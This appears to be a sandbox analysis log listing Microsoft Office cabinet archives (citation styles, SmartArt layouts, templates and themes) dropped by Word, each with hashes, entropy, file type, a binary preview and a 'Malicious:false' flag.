                                                                                      SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                                                                      SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                                                                      SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                                                                      Malicious:false
                                                                                      Preview:MSCF.....;......L............................;...?...................;......g...............sist02.xsl.................Content.inf....!....[...=.rF..3U.5...g.i?..w.oY..If'.......Y.;.B.....Wo.{T.TA.~......8......u.p....@Q..k.?.....G....j.|*.*J69H.2.ee..23s..;3..i..L.,...0se.%J........%.....!.....qB...SC...GAu5.P..u7....:.|.$Fo............{.......v.v.g..{o....e.....m.JeRG..,.%.1..Lh.@8.i.....l.#.HB`B....C......D@....?....P?..................|.9..q.......9.n.....F...s,....3..Q..N......y......_i..9|.<w...'q.Tq...U.E.B...q.?.4..O(_O.A.......*jC.~.21.7.....u.C...]uc.....-.g.{C~9q.q.1.1...4..=.0.Z.^....'../....-.6.K.....K...A#.GR..t.@.{.O.......Q5..=....X...^...F3.e.E.Z..b+R..?Z..0T1.....gQz.&....%y=zx.f.....6-*...u.Rm..x<...?...!g@.}..).J...:*...9.s&.v..}..'...\..Sd..F...........kQr.....h..3..1....B...B{M...%O.59.\.#....s/.pE.:}...k_.P.>.zj....5|.9+....$M..L........(...@#.....N.....N.*..........E..7..R$.:9!r>7.....v...>..S.w....9..]..n.w.;&.W..<r\S....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):30957
                                                                                      Entropy (8bit):7.808231503692675
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                                                                                      MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                                                                                      SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                                                                                      SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                                                                      SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                                                                      Malicious:false
                                                                                      Preview:MSCF.....9......L............................9...?...................8......1P..............iso690nmerical.xsl.................Content.inf...A@...[...5.....33.E...P.../..........5sv.]3srm8.T.=.......}.v.T.. ..4IH.r.%Z.(.q.\+K..[,....E....A......#CEF..}p..Y/s$...YKI.#M.?.t.1#C....I..v.vn...-...v7../S.m.Ma.....!.Y....4.......3.3....c&R9..%......(J..BDMI.>7J.....".....}.w.}w.wg.v...^.n.{....{f.mlI..%.#..I..S....D..QJ U......4........K.(@....DH.....}...8;..z...&0%e..G.OAM..x.3......\....zS9....}......89.B...e.W.p{;.....m.m3...}....../...q.~..;.,..".j.g..^N............iC.../|...g.=..9.Q].Gf.....QA....74..v.....9.n[......0.}..jo{y./.2..Ym......;u...b.(Jz^.....~..uM...{s../..#.)n2..S.S.c..6)U.V....!.'R.......P.S.D..S.p/......D.......{......?.u.",...Mp._....N..+..=Y#..&0w....r.......$.xwC......P.e7.>O....7....].y%q^S'....*.C.`.?..}Q..k../u.TK...y........S...{T.?......[.H.'L..AS.Y.|*..b...J.H-.^U>'9..uD[.".b[.l.......o..6.L).h.B0RJa.b..|m:.):......F
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):31562
                                                                                      Entropy (8bit):7.81640835713744
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                                                                                      MD5:1D6F8E73A0662A48D332090A4C8C898F
                                                                                      SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                                                                      SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                                                                      SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                                                                      Malicious:false
                                                                                      Preview:MSCF....:<......L...........................:<...?..................D;.......V..............harvardanglia2008officeonline.xsl.L...............Content.inf.Vu......[...E..o..3D.5..nF.A..+.e.....6r..f........M3...-.s.m.... $r.b.!.q!.....G...0.\.......fd......%m...'1Y..f..O...*.#.P.,{..m...|..ww.{.m...f...n%...,..y...0y...8.Q...`.../.q....a...',.V......8.7..8t..................6.]..6..nw..ynm..-l.Y..,.I?..$....+b9$E!S@"..) .4........H...lA...@!a.F.l$..0#!.....n&.5j.t+..1f|.+....E.zDk.l8.+<q.^.........\5.l..iT.9...........Y..6.^,.o.bn.E*5w..s.../...W.gS..j9..'W.F......].4\Mzz..Td..Ho..~.Q...Z..D..O.JP..m..s.j.:..........y._.....#.*.rD....60.\!y........p.o3,..Ub,......[[L.{.5.....5.7UDB9.{;;g.z.z..jM.G.MY.oe.....(r..B6..CV.7Fl.Z/....-.O.vY.c...-..........b.T)3.u..f~x2.?.8.g.x.-.....Qt_...$e.l..jtP..b....h..*.sW0.`.....c...F_....t.........LC..*5I.X$^.;&....#.._\J..........;..wP..wX.qy.qs...}46..fK.XN.&0........k1....8...............'t.......}.......O_.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):22340
                                                                                      Entropy (8bit):7.668619892503165
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                                                                      MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                                                                      SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                                                                      SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                                                                      SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                                                                      Malicious:false
                                                                                      Preview:MSCF....4.......D...........................4....?..................1...............ThemePictureGrid.glox.....1...........Content.inf....K..5.[.... V.q......B.....?.h.i.J.D...Z...>.....i~...A...Z....H.hy.D..X.....>...L.I..`. z w0}.K`.C{h....W\../.U..p\%...B...;............9..8.^M.....].lP.p...|..?..M....E..S.`..-n........Q'.'.o..C}=..?`.bQ...J"0f.. ....k3n..F.Pu..#...w].`<...."D.].-.#+):..fe..=<.M...4..s.q.f._.=.*T.M..U.[R.kbw.,......t6_I...~.X..$_.q....}2..BR...).[...<.l.3........h%....2.$`>..hG...0.6.S......._3.d~1.c.2g....7tTO..F.D.f.Y..WCG.B..T....Gg&.U'....u.S/......&6w..[bc.4....R.e..f.,....l."........I....J.=~...$x.&2...+,-.;.v.'.AQ.fc...v._..rZ..TYR...g?..Z..!.3mP dj...../...+...q.....>..../...]P.z?DW&.p..GZ....R5n......,..]{].0m.9...o.{...e."...8VH....w"%;.g\.K..p.}....#r.u..l.vS...Y.7U.N*-E@.....~....E...x.....C.......{NP....5Ymk.*._.K...Z...f..;.......b.....,._@B..\.S..d.'\rs..].}.5"XJU.J..'.zk}.+P.)C.X.?9sx.D....(K....P^N_D...Z.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):22594
                                                                                      Entropy (8bit):7.674816892242868
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                                                                      MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                                                                      SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                                                                      SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                                                                      SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                                                                      Malicious:false
                                                                                      Preview:MSCF....2.......D...........................2....?..................0...............ThemePictureAccent.glox.....0...........Content.inf.o.@D..8.[.........B.....?. $...K.....~....aZ.WA"...k.......Z......."......"..X.fpB 2@d..87.[.A......p..e.'......F..P^%.%.RK...........T%0..........9..+8 ...&.q.....+.......^.fad^^n...d.....s1..... .3j.c-c7..y<.....6........C5n.KG...Rs[lt..ZkwI.!..Uj.ez_!A^: /.;.Rl4....^..<6..N...'.YY.n*.E{.`..s.7..z.......L.y.Y.....q.kx.....[5.+<to......1...L.r.m..kC.q.k.1..o.w8s.....xh.@.b.`l\...}z1.6..Y.</DY...Z5..D...0..4.;..XAA..0qD..E.....h...C..hH......S..Z.\.VBu......Rxs.+:RKzD......{......a..=......).<.....d.SM.......c!t.4.h..A=J~.>q?Hw.^.....?.....[..`....v.nl..A.u...S!...............c......b.J.I.....D...._?}..or.g.JZ#*."_``.>.....{...w......s...R.iXR..'z....S.z.\..f.....>7m..0q.c-8\..nZw.q..J.l....+..V....ZTs{.[yh..~..c........9;..D...V.s...#...JX~t8%......cP^...!.t......?..'.(.kT.T.y.I ...:..Y3..[Up.m...%.~
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):21875
                                                                                      Entropy (8bit):7.6559132103953305
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                                                                      MD5:E532038762503FFA1371DF03FA2E222D
                                                                                      SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                                                                      SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                                                                      SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                                                                      Malicious:false
                                                                                      Preview:MSCF....c.......D...........................c....?..................................ThemePictureAlternatingAccent.glox.................Content.inf...3.....[.... .qq...........\<.^......o."......f.o...x.{..q..^.MH^...........{0.K....4pX.i...@6A4X.P.01d....'p.......zA.......... .......7.......a. `.=!@- ......>G.s.k~@.a.lfha:m....1...@.,G`....{....W..N..qs.......j.+TrsT.l.9..L...1+...d..-u..-.......).#u&...3......k.&C...DdZ.'.......8..<PF..r.eq.X6...u..v...s5.m.Q.l.G%.<.]....RV<...S..Dv..s.r.......dh.N.3-.Hf'.....3.GZ..E.kt.5......h...|...?!.L....~.)..v....:2.../F.,....o.qi.i7..E.|.mh.R_.@A.FO@i.....Feo...x.l...{E.\W9|V...=#..3..(......tP.:i....Ox.U.N...%6...p.6&.....<zh.z.|.<Z.?.k....y7m...F.Z$-.:.l.h...{T..7....?..T...d,r...z?../...`/Z......a.v@)....u......V..v.:.._.|.'..[..O.s.OAt-."b.In"..I...J*.~H.:-...?..uV....dZ;z:.l.{.E.,.Q..i]:.0r.I.y..f...../j.wN...^R.....u....>..}....f.f...]A..C~;/....%..^#..N.a..........99.....`.....%..iS....S......$....)
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):21357
                                                                                      Entropy (8bit):7.641082043198371
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                                                                      MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                                                                      SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                                                                                      SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                                                                      SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                                                                      Malicious:false
                                                                                      Preview:MSCF....].......D...........................]....?..........{.......................rings.glox.................Content.inf..|^.....[......P........<.$.."..0R..xa.Ax#B..d... ....K,.....^.H.....H.........&.j.\f.. ..,....,..!k..R..e..!...E...........................><.RB.....~h...........Q................g..M|,...x.....qV7.u..\...F-N.{-..X..&Zig.~..{.A.p.Z...X..{,-n............`$.%.ND.....>].6cvZ.%d..*a.$..-.K.Hf....L..;.#...H....U,........P.@.*-$C.,.g...%YJE..$.jP........b...Y<..[U...MF]F.K...1... x.}3w.o.#,.}T.....w5+...=.=...c.F^....OM.=.......G_{n.*...WC.w!......{/.~.}..s..6_......)..Xy...4.....<..XZJ........#~._i....%..fM.V.?.q...q.....7...B..sVt...(.:..c....~.e...kGZ...C..(J..o...`...?.)-.T.l....&...gR.$.....g.:...2.e%F.....x....z0...K..a8B...........D..]....7....~.".DR...r)...}b)e.>.\h~f...(}.c........Q...o5H.........C.KC.(.L.l................R..a.pg{..\.......-b........}.C......qTS..%..r.lG..Q.1..Z.>a.D...tC..LV...Rs.C.M18x.:......%O.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):19288
                                                                                      Entropy (8bit):7.570850633867256
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                                                                      MD5:B9A6FF715719EE9DE16421AB983CA745
                                                                                      SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                                                                      SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                                                                      SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                                                                      Malicious:false
                                                                                      Preview:MSCF....H.......D...........................H....?..................................VaryingWidthList.glox.................Content.inf...O.....[.... v.q......R.....>.%i.I.HhD.V...qt.....'....N...!..aw$(J.%(..A..h......l|.D.p9`..Y09.:.u....p. :,.*.YD=0.p. ......w.........*..<..;.....u.."......7[....8.....?^........-..;q.|.....B....PJ....r.K#.#.0'...}.........+gpR...T....5.iu.^I...A\..gK....}..z.B.nT.../.m.......N....E'1.E.\..o.....W..R.#.#...8.7...R.SbW-...%......$.obj.F..W_@....sY!........s.O..."k. ..b....j....v...P.\....7d...|"J.T...2p..m.&..r..,2.).....X.`...xt].U...b.h..V.....|L..N.Z.O#....o...1R.w30.g..?;..C.T.:$..MGY.C"i\.f..#..<.k...m..s.w. ..Ga].....wt.h|.Ta<.......(SO.]9.%a..Z... r._JH.=O...P.9a.v.....Kj.".T...m...4.?...F...$...y.....hbW.UA..u.&)....py.C{.=t.....n...}|H3A9.=..W..JJ..y./Y.E.M9..Z..w. .HB.YoIi..i.e..9;n...SpHw,....f....d>..g.m..z...... ...f...KP.M..U.....~vFD.fQ.P?......2!.n.....`@C!G...XI.].s,.X.'...u.E.o..f
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):43653
                                                                                      Entropy (8bit):7.899157106666598
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                                                                                      MD5:DA3380458170E60CBEA72602FDD0D955
                                                                                      SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                                                                      SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                                                                      SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                                                                      Malicious:false
                                                                                      Preview:MSCF....uk......L...........................uk...?...................j......r...............Equations.dotx.................Content.inf.94v..R..[..... .............v........." Vw.w..r.....D.V5.p...W......b;....\x.....f.-...............l.....L.F..*..@..BnF.I.....%1..0....&.X.......X-.\.\.>..A....@..:...N .G./.Sp.A0.0.`.....q....b... ......S.{K...V....J............>\....\.E.#.,$.hxu.F.Fo....<...{..6../..#..l>d...w...&...S.....L.].....^..L......;~l.......qw.o. .....v.u.W`.4Z.A.....dC..Q)9.c..qgtfJ..G.(.J....q4V.).mK4;..zY..b.5&....V...0X.].Z..U.Lx..^..:8XQh.....7yy.._5............c.W...c...xY..%..G.$....kg^.1g.9.....z^.'...q."..K)a[.pW .LS.:Q8.....2..._q.os....y...d11.*.m....8.,.^.4_?i.e.u.,....._y.....zZZA.D.D<..+....{....Sfnv...t.....0...vV..y.r..3..%.<.t......;.h.wh.-.g.>..5...R...........y..]^..R..<...>$~.'...kk.n..H.EN.eQ.Q.O./='....)t.l0,/].....FNN......?...&..'.eS....K.K.v".^L..x=.^......1x|....=}@...B.kq;_a..C.q?..Y9.v......Q..u.G..V.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):46413
                                                                                      Entropy (8bit):7.9071408623961394
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                                                                                      MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                                                                      SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                                                                      SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                                                                      SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                                                                      Malicious:false
                                                                                      Preview:MSCF....=v......L...........................=v...?..................5u......................Text Sidebar (Annual Report Red and Black design).docx.v...............Content.inf..C,.zd..[............... .w.....b...wwww]r..W\ww...... .hh...........o.nz.....Ku.7..-.oH...h;.N..#.._.D,}......!Q$..Un.tI11..$w.r3... ..p...=.1....""..n...*/....h.A...Y..c,.Q.,......",..b.1.w..$.....l../;..J.....~.. ....+.R#....7.-..1.x.feH.@.......u...(.DQ%.wL.N|.xh...R..#....C...'X.m.....I{W.....5.C.....\....z.Y.)w..i...%....M..n.p.....{..-G9..k.bT.6........7....).....6..ys.....R.e.....0.Xk`.3..X\xL..4J"#.f...:....r..2..Y.uW..052.n.+ ..o..o..f&u.v.&9y.P..6.K..in.DU.#.~....4i..6;.5.w..i...g.(....../..0*Vh...C..//....W..:w......7.6....]....4.*9...sL.0k...zHh..2N.H...*..]..(.x.:..........Y.+...-.....&.*^..Q.sW...v..w.....k.L.e.^.W4iFS..u.....l.g'...b~:Zm...S.2.|......5S..=.............l.../|....G|.9 ..#.q...W.Q...G=.."W..'.6....I....D._.{.g.47....V.1._..<?....m............)..T.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):42788
                                                                                      Entropy (8bit):7.89307894056
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                                                                                      MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                                                                                      SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                                                                                      SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                                                                      SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                                                                      Malicious:false
                                                                                      Preview:MSCF.....h......L............................h...?..................@g......o...............Element design set.dotx.................Content.inf.Y/..Re..[......f........,..]....D.],....]..X.......XC4pE.....p........2..u;L.N.....]G..d.^d.$).e.=..;..Kb.../.../....H.."...w$._I..5.....a..4.Gd5p......v.8..1..%H..\..e...3.e..A..).d*.. . (.8.".......(>..<...@...~*v&.f..LWhqk]+Uep.d..%...o.....k.......e...nNN.&_.>.d.?H`"...r?..Z.p..q..<M.N.t....{*.y]#...._XW"qI...x.......}.. .N...;.}:..m8...[.r.F....^?...o...u..*...J3.V....~...~tn#.Kf6.s.|*..,s...M.$.f..?Yu.pE.1_wU...%....._..'..Z......y:.{.J5..7..Q.w}/.~.-3~Ctw=..IT.....mI.u@...y.M....2.%...y...Y..j.k<-.Q.r...7m..b...+.6..|.....U..}[...,....^....5..D..qW...[3).p.Y<.Hh..t...%cw=Z..W.~W.F....zr.4.g...O...P.g_^..3.-............3s...S..y...u...N...EsJz....tT../..c[w{cG....../6.....:.W<d5}.q..s..K"$........Ne..5..#.v'..n4.rj....Fc=....5..VN.....6..9`....|..........WX..-?..........W.)^`1.......].R2..s6...H.......
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):222992
                                                                                      Entropy (8bit):7.994458910952451
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                                                                      MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                                                                      SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                                                                      SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                                                                      SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                                                                      Malicious:false
                                                                                      Preview:MSCF.....'......D...............]............'..H?..........z..................M{. .content.inf..l.........M{. .View.thmx......R..[...........@...G...I..(J.....B....Q!....}Ju..(BR..._|.5.%.....6m...........?.w{.rm,....#....;Ba#.:v...Dv.."u.v{!...f}......!......:.S.......".z.f.......==.n.0Km0eh.Kbm.C.r.6.........d..h.....{..w..}....2sb...rvm..x...0(..B... ...BH.r#.@..d".*..F+...Q.sx.....?...d.d.eZ2W2.2d...q.I....4.e4....#.....K...3...1.p.y......>.~V....cm....n^..b.{..._D?..AG...'...k.L&..h}=p.....Wl....(.......>.~.].....'.4.W{......../......7.....'.s...w...6..hn..e.2.).l]u.v4...GF.X..X..X....G.i.\..y.g&.<&ti......Sp,j.....>I..S..%.y..........S..-).+...>...D..............[...d...jt.~<x.a(.MDW..a..ZI.;+..!,.$...~>#...).R4...K.$.Zm......b...........{..._..A{.}..r...X...T.ZI.T.).J...$.".U,.9...r.z.)......}...()<....m....QS.p...;?..5.W~2r.EZu..P.1.%'l.........+/6.Mm.|2....Ty..f.o.S.....3J.._...X,..m....:..1.<GqFy.QA9W4.=....n...ZP...O.\.[...:8.%.^..H.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):307348
                                                                                      Entropy (8bit):7.996451393909308
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                                                                                      MD5:0EBC45AA0E67CC435D0745438371F948
                                                                                      SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                                                                                      SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                                                                                      SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                                                                                      Malicious:false
                                                                                      Preview:MSCF....tq......D...........................tq.. ?..........|..................Mn. .Banded.thmx............Mn. .content.inf..;.u.i..[...............?....^.j.{j.B...$M/!...W....{!..^0x/.6...&............w......$.B..J.?a.$=...P..L...d..........+./.\..E:h.....-.$..u-.I..L\.M.r..Y..:rtX:....8...........+8.}{......&.-..f.f..s3-P.''.r...Z-"/E../...^%^N(,.$..$.H..O........q>...|.|......y..m.)u....`.....z.n..-.[.5....xL....M...O..3uCX..=4.....7.yh...dg.;..c.x.4..6..e..p.e"..,.!.St{..E..^I.9j....;..`.Y..#.0..f...G.....9~./....QCz.93..u%hz.........t9.""........)..7K.c~E!..x.E.p...[......o..O.j.c.......6.t{...".....t9V;xv....n<.F.S2.gI.#6...u..O..F.9.[.L.....K....#..zL..I...o....k...qog.......V..BKM..#.bET.)..&4..m.w...*....E.a[.Q.y.B...w...r.nd...)...<..#..r[4.y...#.z.....m?.2K.^...R{..m..f......r?]..>@...ra$...C+..l].9...."..rM9=......]".'...b&2e...y..a..4....ML..f...f"..l..&.Rv=2LL..4...3t_x...G....w..I.K....s.t.....).......{ur.y2...O3.K*f.*P(..F..-.y.Z...
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):276650
                                                                                      Entropy (8bit):7.995561338730199
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                                                                      MD5:84D8F3848E7424CBE3801F9570E05018
                                                                                      SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                                                                      SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                                                                      SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                                                                      Malicious:false
